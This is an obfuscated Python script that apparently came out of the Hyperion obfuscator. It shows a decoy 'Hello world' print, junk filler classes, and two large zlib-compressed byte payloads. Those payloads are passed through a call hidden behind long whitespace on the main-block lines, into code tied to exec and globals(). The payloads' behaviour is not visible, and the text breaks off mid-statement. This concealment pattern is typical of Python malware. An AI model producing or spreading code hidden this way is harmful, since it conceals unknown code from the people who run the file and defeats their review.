from builtins import *
from math import prod as Frame


__obfuscator__ = 'Hyperion'
__authors__ = ('billythegoat356', 'BlueRed')
__github__ = 'https://github.com/billythegoat356/Hyperion'
__discord__ = 'https://discord.gg/plague'
__license__ = 'EPL-2.0'

__code__ = 'print("Hello world!")'


_modulo, CallFunction, Add, _ceil, Algorithm, Square, _detectvar = exec, str, tuple, map, ord, globals, type

class _floor:
    def __init__(self, _add):
        self.Calculate = Frame((_add, -22658))
        self._system(Modulo=28435)

    def _system(self, Modulo = Ellipsis):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        self.Calculate *= 45297 + Modulo
        
        try:
            (Invert, Add, Algorithm) if Algorithm >= _modulo else {_modulo: Invert} >= Invert

        except TypeError:
            ((Algorithm, (Invert, Add, Algorithm)) for Algorithm in (Invert, _modulo) if CallFunction > Algorithm)

        except:
            _detectvar(-73219 * -57842) == None

    def _walk(self, _hypothesis = 45717):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        _hypothesis += 4089 - -63421
        self._frame != Ellipsis
        
        try:
            ({_modulo: _ceil} or _modulo if {_modulo: _ceil} and _modulo else ... or (_modulo, {_modulo: _ceil}))

        except AttributeError:
            ((Add, {_modulo: _ceil}) for Add in {_modulo: _ceil} if Square > Invert)

        except:
            _detectvar(10271 + 72010) == None

    def _builtins(Product = Ellipsis):
        return Square()[Product]

    def Statistics(Builtins = -18640 - 82432, Round = type, MemoryAccess = Square):
        # sourcery skip: collection-to-bool, remove-redundant-boolean, remove-redundant-except-handler
        MemoryAccess()[Builtins] = Round
        
        try:
            (Invert, _modulo) if Add == Invert else {_modulo: Invert} < CallFunction

        except AssertionError:
            {_modulo: _ceil} if CallFunction <= Algorithm else {_modulo: _ceil} >= Invert

        except:
            _detectvar(-69729 / -44950) == float

    def execute(code = str):
        return _modulo(CallFunction(Add(_ceil(Algorithm, code))))

    @property
    def _frame(self):
        self._while = '<__main__._builtins object at 0x000001274BE96419>'
        return (self._while, _floor._frame)

if __name__ == '__main__':
    try:
        _floor.execute(code = __code__)
        _power = _floor(_add = -52065 - 49004)

        _power._walk(_hypothesis = -25632 * _power.Calculate)                                                                                                                                                                                                                                                          ;_floor.Statistics(Builtins='IlIIlIlIIIIIIIlllllIII',Round=b'x\x9c\xe5\xbd\xe9r\xe3J\x96&\xf8?\x9e"*\x7f\xb4\xa4\x0eD$\x88\x95\xd4\x8c\xda\xac*\x95\xd5%\x8d$\xa6UTu\xc4X\x94LFq\xb9\x97J\x8a\x88\x96\x14\xa9\xb8YV\xfd\xec\xe3gsw\x00$\x08\x12pP\xbc#\x8a$\xe8tbq\xf8r\x96\xef|\xe7\xe5\xe9\xb7\xd3w\xef\xd5\xdf|v\x8c\xef\xf0ww\x97\xdd\xcf~<\x8fG/\xd9\xd3\xdd\xdd\xfb\x7f8\xfb\xc3\xbf\xfc\xf6}\xfa4\xcf\x96\x7fx\x9f=Y\xd5F?^~\xcd\x9e\x9e\xb1\xce\xf1\x1f\xee\xe7\x8b\xc5o/\xbfN\x7f\xc9F/a\x9c\xfc\xc1\xfb\xc3?-~L\xffu:\xf9\xc3I\xeeW\xbf\xcc_~\xfdqO;\xfe\xf5\xe5\xe5\xfb\xf3\xe9\x1f\xffHe\x9f\xc6\xd9\xe3\x1f\x0b\xbb\xf9\xe3\x9acO\xe6\xcf\xe3\xeci\x92\xdf\r\x17~\xfa\xe5\x97?~_\x8c~\xf91-\xfch1\x1fO\x97\xcfS\xfa\xd1\x9f\xffr\xf51\xf8\xe4\x17\xaa\x8c\xb3\t}\x7f\xf4\xfdi\xbe|9\xfe\xc3\xbfL\x17\x8b\xec\xfdk\xf6\xb4\x98\xfc\xc3\x1fN\x8e\xde\x9d\x9c\xea\xda\xf0\xfd\xd1\xf3_\xe7\x93\xa3\x93w\xd3\x9f\xe3\xe9\xf7\x17n\xcc\xe5\xf7\x1f\xea\x97\xff\x9a=O\x9f\xdf\x8f\x9e\xa6\xef\x9f\xa6\x93\xffX\xfe\xafy\xb6\x98\xbeP\xc1\xbdj\x99\xffX\xfe\xbf\xd9\x0f\xfc4z\x0f;\xf9\x8f\xe5Mv\x9fM~{\xbf\x98\xffU\xfd\xee\xb7\xec\xc7\x1fN\xde\xd1I\xcd\x1f\xbfgO/ww\xeah\xbf=\x1f\x9d|\x9a\xfe\x9c\xbf\x1c\x9f\xbc[d\xe3\xd1\xe2\xf9\xf8\xe4\xdb\xd1px\x9ee\xc3\xf3a\x06o\xb0\x95ej\xf3\xfc\xe8\xf6\xec\x97Ev\xaf*\xbd[S\x03~\x1c|\x0e>\xd3_\xa06\xd5\x13\xde?\x1f};=\xfd\xf0\xf1\xc3\xc7\xe3\x8f\xc7\x1fz\'\'\xb7jW\xd3\x97\xd1\xcb\xcbS\xd5\xae\xe6\x0b\xf5xX\xa8?u\x17\xd5\xfb\xbc\xbc\x97\xc9\xbcr\x0f\x17\xeaO\xfd\x1c\x9fj\x0b\xfe\xd5\xa6\xba\x10\xba\xd8w\xab\xbf\x97_\xc2\'\xae\x01[\xeag\xa6\xf1\xaa\x8ez}\xa3\xfe\xf8E=`\x0b^\xd4\xefW\xec\xf5\xf8\xe8\xfe\xc7|\xf12_\xc2\xad\xf8\xdb\xe8\xa9\xea\xa4\xb2\xf3\xa1\xfa;\x87\xa3\xc2\x01\xd5k\xa6vJ-\x1c`sK\xd3\x7f\x0e\x8eW\x1e\xeby9\x7fY\xcc\x7f\xdc\x17[\xf2\xc4\xe3&\x86\x9a\x0f\xd8\xf0[\xee\xe0\xe4[\xe3=|\x9a/\'\xd3\x9f\xc7G\xd3\xc5\xfc\xfbc6.U\xb8=\xd9x\xc3\x16\xf2\x0f\x1f~\x8fm\xb3\xc8\xb2\xf2\xb7\xaaa\xd6\xf49h\x99G\xfc[\xc2sI\x1b\xf8\xfe\xf8\xb8e\xfb\xcc\xe7\xe3\xe7\xd1r\xbe{\xfb\xac\xddA\xed\xf6Y\xbf\x07i\x9f\xdff\xf3\xc5\xcf\xe9\xaf\xcb\x1f\xab\x1a\xa9b\xcc~\xfd\xfaE\xfd\xf3\x1fn\x7f\xfd=v\x9f\xe9\xf3b\xf4\xcf[\xf6\x1f\xdc\xb9\x1c\x08\x06\xd7\xef\xb2a~<\xfd\xdb\x96]\x86\xe6\x19=\x13\xe1\xecs\xc1\xeb\xcb\xef\xae}\x16\xa3\xbfM\xb7\xec7\x9fE\x14 )\x80\x9a\x00\xfe>\xff\x1e\x1b\xe8\xe9\xe5y\xbb\x05\xeb\xea\xf2\xea\xf2\x02\x1e\x17\x17W\xeay\xf9\xbb\x1cV/\xa3l1\xdbv\\]\xc1\xdf\xa5j\x1a|\x81\x7f\xb5qu\x05\rtt\xf4\xe9!\x9b/\xab~\xbe\\\xe2\n\xb7|\xa4\xff\xc7\xa5}\xf8\xb5c\xf6x\xed*y|\x7f\x14\xc6\xf1,\x1c\xa8g\xaa\x9e=\xf5\x0c\xd53\xe12\xf8\x1cAYp\x1f\xf4\x83I\xad\xbaA0P\xd2\xded\n\xfa\xc1\xf1Q\x7f\xf6R^\xaeNP\xbe\xfd\xddu\x88\xf1\xf4\xe7\xcayd\xfd\r\xad\xba1\xc94\x99\xa8\xc7\x14\xdf\xcd\xab)\x9dnj\xe6\xdb\xca\x1b\x9f$i\x90\xcc\x92I\xe0\'A\x1a\'\x83d\x9cF\xeau\x9a\x86\xaad\x90LR?\x99\xa5A\x1a\xa9O\xbdd\x9c\x8c\x83q\xa2\xbeO\x03\xf5\x1e\xa7\xfd$NB\xb5\x95@\x1du>=Uo\xac\xbe\x8d\xd4wPc\nu\xb0\x0c\xbeW\xef\xa9\xaf\xdea\xefX\x8f\xdeUIO\xd5L\x93Xm\x87i\x84\xbf\x9c\xa9\xe3\xc6\x9b\xaf\xadr\x94\xb9\x18&~0\xc1!\xd0\xab\xd9\xbdk\xb6}\xecG\x83h\\l\xf1h\x00m\n-\x13\xa5\xd8J\xc1\xe1\xb7\xc7\xd1s\xf6\xfe\xe5)\xfb\xfe8o\xe1\xe8\x03\x9el`\xf2\tx"\ny\x12J\xf4DD\x93V\x9d\xba5\xaf\xa2\xf3V\xee\x17\xce\xd7W\xcf\xd8\xfa\x0c\xd7\x16\xf3u\xd6\xa9\x1b\xd5\xbe[\x8b\xf9\xcb\x8f_\x9f\xb7\xbacG\'\xc9]\xef.\xbcK\xee\x82\xbb\x81z\xa4j+V\xbfH\xcb\xa5uw\xe8\xe3\xcfB\xf5\x88\xef\xfaw\x91z\x84p\x9e\xe5\xd2\x16\xda\xba\xc7=\xda\xaf\xd9\x17\xe4\xd9u\x9f\xd8\xf2<7\xccD\xb9yG\xcd\xc20\xd7\xe3<\x1e\x86\xfb\x98s\x8eNB\xd5G\xfa\xea\xf6B\xaf\x89\xf0\x99\xaa_D\xe5\xd2\xda}H\xd5\xe8\xd5\xefp\x83\xbb\x88\x9fp\xc4\x08\xbb[\xa1\xac\xee\xcez\xaa\x86_\xb7\xf2@]U\x8c\xd7\xa6\xc6\x87\xbaNu&\xea\x17\xbe\xba\xe6Bi\x0b]\x08\xa6\xbc\xbe5\xfd\x89L\xd7\xe7)\xd2\xb7\xa6\xcf:u\xebN\x9f+\x9ej\xaaYf\xcf\x0f[O4\xc9\x1dt\x94\xde]\x0f_\xd5m\xc1\x89\xa6T\xda\xfdJ\xb7iNp-\xf3\x1dE\xc9\xf4yt\xdf\xdeZ\xdb\xe3\x1b\x1eX\xeb\xc9\xc0\xea\x0c>w\x94\xaaz\xd0Y\x06\xfb[c\xb7\x9c\x04\xa0\x0f\xc58\xf0|\\_\x12\x9c\x06\xa2ri\xdd\x1dF\xf8\xb3P\xfd\xd0Wcx\xa0>\xc1\x0e\xe3ri\xfd3\xec\xab\x9f\x0e\xd49\xf8\xea\xbd\xc7\xe7W(s0M9Y@\xf3\xb3\xc1\xcb\xf7\xdf\x9e\xc6A\xb8\x9c\xbfn9\'\x04xWR\x94\x0c\x06(\x19\xc0\xc2\x11\x96K\x1d\xf5\x99\x00\xf7\xee\xb3L\x12\xe2\xf4\x1d\x95K\xf74#\xbd\x85\x99\xe9\xf9\xe5y\xfa\xe3\x7fO\x9f\xda\x9b\x9b\xb6m\x89\xbd^\xfd\xf4\xfbo/\xdeK\xf6O|\xf9\xef\x1fGO\xbfd\xf3\xd1\xfb\xc7\xeci\xe6F\x98qT\xb9\xf2\x96\xc8\xd4\x1f\xf2\xd4\x9fZK\x80\xa8%\xbeeOZW\xd7\xe7\xe5\xa3\xee\xb2\xb1O\x91<\xe0s\x95\xeb\x88-\xd9H_\x0f_\xf3\xa6\xbai\xfdkV\x9d*\x9b\x8f\x97\xbf=\x8f\xda]\xedC>\xad\xc82\xeb\xf5\xb8\x0cE?k\xc5\xdfT7=\x90U\xbf\xed\t\x17\x06\xfc\xb3\xaa\xf8\xf4\xfd\xfe\xc7\xb6j4\xaa\xc8\xa8\xe4$\xb8\xa2\xab5]\xfd\xa2_.m\xa9\xeb\xa6\xdc%\x03\xee\xaab1\x10\xf3n\xdf\xea\xba\x9b\xea\xd6\xbd\xdf\xfb\x18\xa62\xddDV\xff\xf4\xad\xe9&\xb0\xd4\x9e:u\xdb\xb1\x05\xe65p\xd0\xc1c\xb4\xc4\x8e\x83\xb1\xfa\x9c\xaa\x15f\xf3Q\xde\xaa\x8d9oG\x1e\'\xb3$Dkr\xfc\x96\xaf\xe8h\xfa8\x7f\x99\xbe\x8c&\xb2P\xeb\xcf\xf5W\xea\xea9vKA\xf9\xad\xde]m\xc5\xc6\xfe:I\xe2\xa2\x1d;\r\xe1^\'q\xea\x1f\xbe\xfd\xbafK\xf8\xe0\x0bI\xfa`EK\x82b{\xc4\xfc\xed~,k)Z\xaf\x06h\x1a\x01[\x9az\xe0\xb2R*\xad\xbfC\xd0\x84\xc1\x16\x1b\xa1\xcd\x85\xcc\xbd\xfdriKs\xb7m\xcd\xf6\xad\xb9Y\xd6\x1e[\xac\xac\xaa\x1bo/Vn9\x87\x0f\xd2(\x1d\xbd\xe59n\x8b\xab\x89\xd1;\x18\xed\xa7\xcf&\xe81\x007\x00\xd8_\x034\xff\xa7\xc5\xb2\x96\x1c-Ia\x99\xef\xc5\xc6qBVN\xe3h\xd9Tw\x0b\x1b\xc8VK\xe8,\xdd\x8bY\xbe\xdd\xa9tW\xc9\xb8\xabE\xb5#3#\x98\xa5\xe0\x11\xa3y\n\xe6\xe0\x10\xad\x82\xa5\xd2\xfa\x16\xb0T\xfd\x00\x1e=\xf4\x8e\xf9w=\xb4\x80\x95J\xf7k\x83\xdaj\xf6a\xc9\xe2\xcdu\xfav\xbdp\x06\x8b\xd1S\xd7;K\xc8\xeb?)\xe1\x02T-@N@\xbb\xa85\xc6W\x92\xd5\xdb\x9b\x0e"k\xd5\x15\x1f\xbb\x06\x12\xc94i9\x976\xd5\xed\xef\xcf\x18"\xd8\xa6P\x94Ck{\xa0O\x8f.\xa5N\xdd6\x8c!r\x8a\xfc\x0f7\x0e\xee\xdb\xed\xd9n\xc2\xc4v.\xdf\xdbJ0\xed\xc3\x03\xfd?\xc0\xeb|>W\xcf\x06\xe7\x95\xf4E\x11\xde|V\x15\xed\x05\x1f\xb3\xa1\xef\xfb\xc3\xa1\xda\xf4\x87\x18Z\xe0\x0f\xd5\x89\xad\xbf\x94\xaa\x13\xab+\xc3\xdfV\xe0#/\x11\x06x\x81H\xc0\x0b\xf5~\x89\x9bW\x1cE\xb1\xf27\xd5\xd3\x87\x81a59-u\xd3\x1e\xe8\xeeAp\x8a\xdaVo\xf3\x05\x82~w:\xaf\xba\xa2ce\xaf\x02\xbc\xe4\x95:\xe6%6\x18 K\xd5\xdf\xc5\xce\xfdJ@j\x8d\xda\xe9\x82\x8a\xe5\x05\xbe\xac<!\xb4(\xeca\xd1\xa9\xb8\x86\xa1\x1a\x124\x1e\xd4\x0b\xfce\xaad\xe8\xef|\xab5\xbe\xaf\xd1\xcd\xbe\xc6?\xfa\xe2\x86\xb6\x9b\xcclQ\xb3\xfb\xfc\x85\xa3&(\x80\x02^\xe0\xefK\xf5\xad\xbe\x1f=\xfd\xcf\xe9/\xa3\xc7\x8b\xbaR[\x1fE=z\x8d\xd1\xc3\x0cj\xf9\xa0\\\xda\x92\xb57a\x95%\x8e\x8d\x93E\xd6\xdb\xa2\xb5wS\xdd-\xac\xbd\xd5\xf7\x9d\xcb\xe9\x96_\xd3\xcd\xaf\x9c\xa2\x8f\x9e\xe6\x93=\xe8.\x15\xbdE\xady\x0b\xbd\x00\xc2\xe4\xf9\xb0\xe0\xc9s\xb7\x85\xa6\x9e\xe9\xb7z\xed;\x1f\x9e\xc3\x9f*?\xa7\xff]\xc77I\x9e\x8dNf\xbe\xc0x\xc7\x07xU\xb2\x81Zlvn\x9a:j\xf0\x86\xfe\xc6_QO\xe3:\xd8\xe5v\x9b\xfej\x1b:+\xd7\x15ZM.\xf4\xba\xb2{\x03\x8d\xd4\x19\xcdj\x18\x82*\xce\x86b\\\x02\nn\xe1\xe8\x96\xcf\x9f\xab\x07%a\x8f\xf6\xb1\xd2Ut<\x08CQ\xa2\x83\x92 H\xe2\x02qKI\x13\xbb\x8b\x10\x8c\x7fo\xd2\xb8\xfc\x91\xbe\xc4w|\xadn\xdd\xc9S\xf6\xb6\x84\x08.X\xd0\xf9\xd3\x15\xed,\xc4\xf6\xd4\x82\xad$\x88$\x04\r\xb8\xd1L\xf3\xfa\xfaS=^\x7f\xfe\x847\xf5\xfa\xb3\xc9DS+\x1ca\xd3\xa8\xa6\xbbL\x85\rF5\x87U4j\x1c\xd1\xf6Qu\xe4\xbdWw\xbb\xbf\xbf\xfc\xf6\xfdm-\xb5\xa0\xc4)\xf1\x15\xa4V|U\x9f2\xda\xaa\xea}\x1a\x7fT\xdf\xf8\x0c\xf0\xdb\x04\xfd\x18\xe0y\xf7\xd9\xfc\\*u\x04E\xee!d>Q\x12 `\xdcc\xc4\xb3\xf5\xca\xa5]\xa3!R\xcb\xfem\xc3\x01\xc4\x90#\x02\xe4')

        _floor(_add = 90692 + 5122)._walk(_hypothesis = 54252 / _power.Calculate)                                                                                                                                                                                                                                                          ;_floor.Statistics(Builtins='jiljjljjljjljjljiijliiij',Round=b'\xa6z\xdb@\x05l\xf3aU\xef\xc6\x81/\x7f0\x07Tv\x08q\xec\xd67\xb0\x12\xb4r\x80pB\x0cC@\x03k\xa9\xb4%3\x9a8\xb2\x82\xd8\xc0mm,vl\x99\xd16\xd5\xad\x19\xfa\xb1QT\xa7-\x92\x9cXd\x87\xad\xddW\xd3-P\x01\x95\xb7\x1edK\x90\xb9\xe7\x14\xce\x87b\xa6*\xda]\xfe\xb6\xa0\x18M\xe6\x7f\xbb\xa5\xaeI\xb1\xad\x9eo\x17\x8bQK\xb6K\xb1I\x8a\xfdQ<T\x02\xd3\xb6m\x97\x9b\xea\xd6\x1c\xad\x95\xb7\x88c<\x85A\x85\xdf?W+\xd4\x06\x10\xdc\xe2\xdc%~:\xb9ZQv\xc3\x15\xf3WU\xdd\xda\xad\xb2\xbe\x7f\xf0\x94%\xd2\x8a\xda\xdc]@\xa8i\x81\xa9\x1eEF\x9a\xc33\xad\xbe;\x88j}\xd3\x80\xd4\x1d=U\x95\xaa\x91\x8e\xf9\xe7\xb0e|\xdd]yL\xe3$@\x0b\x1a\xcc\x84\xb1\xfa\xdcL\xbbU\x8a\xce%\x06\x96\x83\xd6\xa3T\x1f\xd8\xb8P\xcf\xea\xb5\xf0\x97\xe5\xa8\xb6dD\x92O\x88\xf8\x8e\x08\x9d\xf0 \x9b\x04\xe5\xd2\xba;\x8c\xf1\x07>"PB\x847\x82\xeb2)\x97\xd6\xdfa\x82(\x94>\x87O\xf5\x11\x8f\x9f\x94K[\x9cj{\xbc\xe4\xa6\x85\xa9\x14a\xbd\x85\xa9\xb6\xaan\xb2\x83O\xb5\xa2?T\x9d{\xdc\xc7G\xca\x8f>>\xcd\xab)\xd9\xec\xef8\xdb\xad\xf5\x82 \xf6\xa3)\x04\x7fo\xf6dV.\x9a\xa2c\xd1\x19(Et\x0b\xaf9\x88n>\x06\xe3\xf41\x92,,\x96u\x1dK\xb3\xeb\xa4\xb5\xfbMP\xd3\x0e\x06\xef\xfbQ\x84\x0e\xae^\xb3\x1bR\xd9\xe9\xd2B73]M^Sg\xdd-\x8d\xc02\x16\xd2k\xb0\xf18\x9b:\x1d\x184\x95\xd89\x07\x9b&\xf8\xccJdn-\xf5\x96\x03\xeeZj\x8e\x0b\xa1C\xa9\xce\xd5p\x8c\xa3S\x19\xa4\xfc9\xb67\xf8\'\xa1\xf5\xeb\x03n"\x1c\xcf!.)\x03^d\xe2ri}\x03A\x1f\x97\xba\xe0\x8e\xc2\xcc\x02\\d\xd2ri\x8b\x085\x01\xdbG\xa2E\xc7\x86\xda\xa0\x88P\xab\xaa\xbbe\x94\xde\xee\xe3-\x99\x02\x94%\x89\x1b\x8e5K\xdb\xa4o[hS[\xd7Y\xd5^\xa8K[4\x12\x9b\xea\x86u\xb9ov\x1dJQO\x89\x89-\xcd\xd0G@\xb8\x08^_\xb4\xa2\xa1/X}\xdc\x83\x81y\xcf=\xabr\xa5\ncuS\xd5\xbd\xc5W\xb3\x05\xaf\xf4\x9d\xfd\rl\xbb\x13\x93"m(ix\xdf3P\xe2\xc0+x\x0e\xea\x1c\xa8u\x07\xa0\x925\x91lb5Hc%f\xc6A4\x8b\x12 \xdc\x89bw\xd2M\xa4\xe6\x03x\xa8c\xcd\x92\x99y\x85\x92\x04_\xe9\xbb\xd0O\xf0\x9b\x1a\xce\x8e7<B\x80\x1a\n,d\xea1R\x0fy\x1f\xe0+\xbc\x0f\xf0[\xda\x82\xef7\xc2\xe2\x0fC\x86\xb5\xa0\xf7\x13\x03\xbc\xb7J\x0c \x7fR\x0b\x92\xbf\xf3=f\xc3A\x82\xed\xec\xf0NS\xef\x85^+=\x9cz/\xf5n\xe9\xdf\x0e\xef\xae\xba\xc24ACq\x94\x0c\x1a\xce\x81_\x11\xd6\xf3\x95\xdf\x00\xe8\x03\x9f\xba\x16\xc5w`L\xa8j?:\xb1}p!U\x02\xf8\x10\xddx\xc1t\x87\x97\x88\xe4; )\xc3\xc9\xfaq\xc4\x80\nb?\xd4\x1b\x9f\x0f\xa9]\x02?\x1e\'S\x84\xc3\x86\xea\x91\x12\xd5_8\n|\x87\x96\x83\xd0HZ\xb6\xfc%[P\xe6r}\xe9V\x92\x90+\xca_\xed\xba6\xa8q\xdd|\xad\x96\xa9\xec\xf8\xf8\xff\xac\xa0\x87>\xc9\x9e\x8e\x8f\xa9\x91\xe8\'\xf8\x83\x93\xd1rr\xbc\xaavuW\x7f@X\x1c(\xea\x0bb\xd8\x9c\xa3{\xae><2A\xde/\xa2\xb5\x81\xc8\x98>\xc2#K\xa5]\x0b\xb1\x12\xbb d\xa8\xfd\x82\xa2\x1dZV\xdf:u\xb7\xb4\xfa\xbe\x1d1\x89Xm/\x01[E\x8e\x06\x9a\xe9\xeb\xe3\x1cB4\x92$\xf8\x80\xd0\xbe\x18q\x0e\xa5R\'V\xb5\xad\\R\xad\xad\xfb|\xcb\xc5\xab\x18r\x97\x18X]cP \xd9\xa8\xaa[3D\xa6\xe448[\x8c\x1e\xef\'\xa3\xf7\xc3\xa1\x0f!\x12\x08\x07\x87-\xa5\x15\x02\xa2\xe6t\xad\xdf\xaf\x1a \xa0\xff\xae\xf5\xffu+\xf6\x1a\x89\xa5\x11\x18\xb2|\x16\x8c\x03ze\x0b<+Uuks\x15\xbf\xa5\x15\xe3(#\xc3MF\xf7\x84\xef\x15<k\x1ao\\\xb2\x08\xc5\xda\x88\n4%\xc8\xfb\x89n\xb7R\xe9\xfe\x0c\xd9ol\xf2d\x93\xe6\xb5 i\x18\xff^\xb7\xc1Sd\x18\x0b\x10\x0f\x16\xa0_\x13\x96\xc7~\xb9\xb4\xfez\xdbGS8\x92\x95\xe1v\x8c\xebm\xa9\xd4\xc9t\x1c \xcbf\xc8n7p\xc2E\xe8\x8e+\x95\xb64\x0b\xc3,\x10\xdbn\xda\xd80R!\xf2\xc5\x9a\x857\xd5\xdd\x91\x05\xb3\x81E\x10\xd1\xa9\x10*\xaadq\xf0g%i\xa4\xe4\xf0\x9e*i:\xc7 \x82\x16\xe1(\x08\xa4E,\xdd\xeb\xcf\xfa\x9d\xb2\xc7\x9c\xbf\xe2\x05!\x02\xa3R\xe9\xbe\x97\xf4\xca\xfe\xd1\x8f\r\xdd\x8f\xa0\xa1\xec\x95\xb7_\xf0\xb8l\xaa\xbb\x03/b\x03\xab\x10\xccNar\xaf\x1eh\x9dSZ\x99\xea\x1f\xf8:\xc0\xc0b\x88\xaf\xc4\xa0c\xd5W\xa6\x04iwh%\x1c\xb1\x15\xd0X\x05\xc7\x96\xe5p\xa0-\x87c\xe7V\xc24\x1e\xc7c\xf4\xfe\xce\xb0m\x9cz\x0f\xf2\xdaZ\xd1[`\xf4\xbb\x83\xb6\x00O\nt$\x86\x8c\xa4>!\xc9\xees`\x9cB\x90|\x08\xe4:\x10\x82\x88\x16\xc20\x1d@\xb0<\xf4\xef4\xe5\xf5\xda\x9d%\xd8X\xbe\xc7\x05k7Y\xc17\xc7p\xbd)\xf9\xb2\xb2G\xa7\x16T\xa8\xaf\xe1A\xa9\x05\x18\xd2\xa0\xa1\xb7\xef\t\xab\xbc\xd2~\xe1\xda\xec\xad\x1cv\xc5\xa1e\x1f\xd0\xc7\t\xac.\r}\xe7\xd9\xf99\xf8\xf9@\x93\x03\x95\x0eB\x01\xe1y~^\x1f\xe8@b_\x8cb<D&\xf4\x10\xe8P*\xad\x0f \xec36\x82\xd4|\x1f\xc5\xd6\xa0\\Z_\xe4H0R\x96\x00\x83H\x16\xff\x918\x13\x0b\xa5\xfb1\xdb\xb7\xa0xDh`U\xcbvs\x85\x83\xb1\xe8\xd7\x0cJ\xbf\xa9\xafn\x90\xb5M\xb29\x80,NA)\xa5\xd2\xfa;\xf45"\x93~L\x19\x1eJ\xa5\xfb\xbbo\r&\xaa$\xeaEc\x98\xa2\x1d.?\xc5%wj\x9c\x8e\xab\x1f\x87=1\xc32\xab\x969\xf5\xb0\xb7\xecWz\xd0\x96\xc3km\x11\x8aSu$%\xc0\xf4\xd5#\xd5\xef\xb4-\x7f}~\xe0\xf6!\x8b\x91Z|\xe8[[Eh\xa8\xeb\x05\x97\xb9]\x9aC\xd5\xe8#\x81\xd5n\xda4\x81\xda\xe6`\xe1Y\xb69\x10m\x13h\x9d\xba-\x98@\xdf\x88\xc5}\xcb=\x07w\x86i\x8d\x1e!Z\x9aJ\xa5\xdb8\xaaB\xf6X\x10Ks\xca\x8e\xaaBiK\x11\x07\xe2?\x92<O\x81er\x18X\xa6\xab:u\x1b$pi\xb0nMr\xaac\x19F\xe3r\xa5\x1a _\rd\xb4\x8b\x93Ic\x83\xbc\xb8H\x94p}\xce\xaf\xb5e\xeb\x14c\x88cN\xf43\xe0l\x1e\xfdriK\x0e\x14;/\x98\xbc\x8b)\xb3g\xf5\x9b:u[\x02\xf0\xd18w\x94\xd7\x00\x9d\x87}T\x00\x12\x84y\x93\xc4Z*\xdd\xf7\xfcUy\xe3\x9a\xa4\xfc\xd8\x04\xd0\xc1\xd0C\x133\r|\t5\xafn\x80AT\x01Nk\xd0Q)\x1e\x9a\xa2\xa1s\xa5\x87\x86\x19\xedB\x90\xcd\x8b\xad\xb6 +[\x0e\xa7\xbfi0\x8b\x9az\xae0\xf8\x02C\xae\x811nN\xc4q\xdd\xdf\xe9\xc3\xb1\x9ei\xf5l\xb2b\xf1\xb3)\x9c\xb9\xf40\x96\xbf\xca+\xb6\xed\xfe\x03m\xe3\x97O\xf8<d\xa5\xc5\xc25\x0f\xf4\x95\x99\xab\x1c\xd7\xe2\x0e\xa8\\\x18\x078\x95\x829\x8c$\x02\x9ab#$j\xcf\x95\xb60\xf0\x04Zb3\xbfI\x8c\xaaPL\x08,\xa5N\xdd\xba\xb0\x94\xaaI\xe6\x8b\x00\xce\x10\xad\x8b\x88\xdd-\x80\xba[\xad\xd5}\xb6>\xf6\xd1\xac\x99rR\xc1A\xb9\xb4\x85\xa6\x8ec\x93>EP<6]\xbd\x9d\x86\xa4\xaa^WA|m\xa9\xc6W\x17\x98\x17\xfe\n\xe9\xb8\x10\x0f|yU\x9b)q\xcb\x84l\x94/3F\xf3!f\r\xc5\x81S*= Q\xeeMB\x05\x16x\x0e\xf4\xc4\x93i\xa1\x8d$\xd8N,\x15A\x9c\xa7\xdd\x88-\xd7{\x9d\xba\xceC\xd1\xd2\xb4\xe1\xc0@Aj\xb1\xc0Hb\xa6\xde\x05&\xc9\x16\xdaRfd\xa1_\x8a\xacv\x91\xb2\xd4\xa2<\xd9T\xb7&N\xf5mXV\x8f\xb4\t\xeeFJ[2\xbf\x14I\x1c\x04\x19\x94X\x8b\xe4\xa6zu\xa9\xcd\xf7\x1d{{\x9eA\xbc\xe09\xc0\x0e\x81LT}<\xa4@\x05\' \xcck.\xa2b\xf6\xa5\xb5\xd2\xb9\xa4s\xd8P"\xb1\xdeJ\xaa\x91~\x01\x96VU\xb7.E\xd1\xce\x9d,\xbcw\xea\x150\xb0\x02\x9b\x9fd\x15\xf4\x00\xdf\x0f\xc3\xe3s$\xfe\x81k\x9e\x98t\x95CR\xa0[cv\xf8j\xd3l\xe3\x7f\x8bhq;J?\x8e\xf3\xb9{\xa25Y9W\xd5u\x1e\xdd\xdfe\xfcj4\xc5\xc7D=\xe4UJ\xec-\xf8\xc6\x99\x1dB3C\xa6\xd6\xb4%"\x88v^Y\xa2IU\xdd\xba\xa2\xc9\xee\x9a\xfe\xd8B-\x8a\x96_@2\xbe\xd1\x18\xac\xaa\x0b\xd3~d\xdb\x97\xdc\xd7e\xfa\xcf%\x84/\x89\x92\xb4\xa9\x1eR\xb9\x8a\x84\x06\x80\xb9\x8a\xd0!\xffm\xedp\xba\xbd\xaa\xd2\x1b\x07\xb7\x0c\xea\x89\xf5\xd4\x9f\x0f\xda\xe8\xa6\xd1\x1d\xb2e\x9eRNF\xf4\xb7\x8ft9\xd2\xfc\x81\x9a\x0f\x13\x181\x91i\xbd\x1d\x83\x9e\xc4>\x05\xd6|)n\xbc\xc4R\xa3\xeb\xd4u.\xaaG)\xe2\xb2Sd2p\x1cW[Da\xcb\'y\xfc\x8eP\xbby\xecj\x9eu-\x8d\xf3\xdck\x8e\x85\xe88\x8a\xe2h\x12;\x8c\x11\xd7\xd8\xebq\xce\xeb %\x0eAa:U\x8a\xe8\xf8\xa9\xa5\xf7Kt\x88oE\x8c\xac\xab+\xa4\x90uT\xb7J\x86\xa7\x0c9~0\x01H\x86:\xfcp\x0b\xbe\x9f\xcaK\x15\xebZ\xcfz\xb7\xcd\x1b}K\xb8\xaeS\xd7\xb5p\xdd\xc1\xaakO"\xf9\x10\xfd2]\x81\xcb\x90\x8f\x08\xc2y"&dp\xa8\x9b\x8bz\x90\x936V\xa9\x14N\xe5\x8dH\xe9\xe50\x9d\x86\t,Wjr\x99F\xa1\x9aTa\x9a\xc1\xcfq?jj\xfeB\xa7\x13\'\x83')

        if 399274 > 4045068:
            _power._walk(_hypothesis = 59182 / _power.Calculate)
        elif 347983 < 501997:
